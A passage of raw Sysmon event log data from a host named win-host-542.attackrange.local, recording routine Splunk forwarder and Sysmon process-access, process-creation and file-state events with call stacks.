Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981183Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:26.371{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8D8E-6151-157A-00000000FD01}3856C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981182Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:26.371{69CF5F33-7F27-614D-0500-00000000FD01}408424C:\Windows\system32\csrss.exe{69CF5F33-8D8E-6151-157A-00000000FD01}3856C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000981181Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:26.355{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8D8E-6151-157A-00000000FD01}3856C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981180Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:26.355{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981179Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:26.355{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981178Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:26.355{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981177Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:26.355{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981176Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:26.355{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981175Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:26.355{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981174Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:26.355{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981173Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:26.355{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981172Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:26.355{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000981171Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:26.341{69CF5F33-8D8E-6151-157A-00000000FD01}3856C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001056622Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:27.731{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92398A7262BEFE09F075D76857DC3DB2,SHA256=6B08F027AF584164D041216ABB36B26C125AF09089B8BC9608FA3627A9A72A91,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981213Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:27.934{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DAE5614B9196823B8CF9CAA229E7FED0,SHA256=4CE4AC4D6F0629A13F8830E4FBCC611ED1B5AA9A3E7B2F11ADDAFE8772AB70C0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000981212Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:27.746{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8D8F-6151-177A-00000000FD01}3660C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981211Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:27.746{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981210Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:27.746{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981209Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:27.746{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981208Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:27.746{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981207Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:27.746{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981206Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:27.746{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981205Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:27.746{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981204Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:27.746{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981203Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:27.746{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981202Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:27.746{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-8D8F-6151-177A-00000000FD01}3660C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000981201Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:27.746{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8D8F-6151-177A-00000000FD01}3660C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program 